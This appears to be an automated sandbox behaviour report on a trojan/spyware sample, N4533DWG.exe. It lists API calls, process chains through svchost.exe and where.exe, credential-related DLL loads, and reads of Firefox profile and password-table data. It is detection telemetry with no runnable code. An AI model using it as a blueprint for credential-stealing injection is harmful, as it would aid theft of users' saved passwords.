                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0037A279
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00368638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00368638
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00375264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00375264
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0031E8000_2_0031E800
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033DAF50_2_0033DAF5
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0031E0600_2_0031E060
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003241400_2_00324140
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003603340_2_00360334
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003323450_2_00332345
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003904650_2_00390465
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003464520_2_00346452
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0031C5B10_2_0031C5B1
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003425AE0_2_003425AE
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033277A0_2_0033277A
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003268410_2_00326841
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003908E20_2_003908E2
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003789320_2_00378932
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0036E9280_2_0036E928
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0034890F0_2_0034890F
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003289680_2_00328968
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003469C40_2_003469C4
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033CCA10_2_0033CCA1
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00350E490_2_00350E49
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00346F360_2_00346F36
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003270FE0_2_003270FE
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003231900_2_00323190
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003112870_2_00311287
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003333070_2_00333307
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033F3590_2_0033F359
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003316040_2_00331604
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003256800_2_00325680
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003378130_2_00337813
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003258C00_2_003258C0
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00331AF80_2_00331AF8
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00319B5E0_2_00319B5E
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00349C350_2_00349C35
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00397E0D0_2_00397E0D
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0031FE400_2_0031FE40
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033BF260_2_0033BF26
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00331F100_2_00331F10
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_020435D00_2_020435D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A332_2_00418A33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015AB2_2_004015AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028702_2_00402870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030C02_2_004030C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F1432_2_0042F143
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040194B2_2_0040194B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101EC2_2_004101EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101F32_2_004101F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012202_2_00401220
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C432_2_00416C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104132_2_00410413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4132_2_0040E413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025442_2_00402544
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025502_2_00402550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5572_2_0040E557
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5632_2_0040E563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004046B92_2_004046B9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD22_2_02F03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD52_2_02F03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: String function: 00330C63 appears 70 times
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: String function: 00317F41 appears 35 times
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: String function: 00338A80 appears 42 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 245 times
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 8816
                Source: N4533DWG.exe, 00000000.00000003.1265729663.0000000003E2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs N4533DWG.exe
                Source: N4533DWG.exe, 00000000.00000003.1264163991.0000000003C33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs N4533DWG.exe
                Source: N4533DWG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/15@5/5
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037A0F4 GetLastError,FormatMessageW,0_2_0037A0F4
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003684F3 AdjustTokenPrivileges,CloseHandle,0_2_003684F3
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00368AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00368AA3
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0037B3BF
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0038EF21
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037C423 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0037C423
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00314FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00314FE9
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.dbJump to behavior
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7452
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808
                Source: C:\Users\user\Desktop\N4533DWG.exeFile created: C:\Users\user\AppData\Local\Temp\aut65C9.tmpJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: N4533DWG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                Source: where.exe, 0000000A.00000003.1751589338.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1754232358.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: N4533DWG.exeReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\N4533DWG.exe "C:\Users\user\Desktop\N4533DWG.exe"
                Source: C:\Users\user\Desktop\N4533DWG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N4533DWG.exe"
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 8816
                Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7452 -s 7820
                Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
                Source: C:\Users\user\Desktop\N4533DWG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N4533DWG.exe"Jump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\where.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
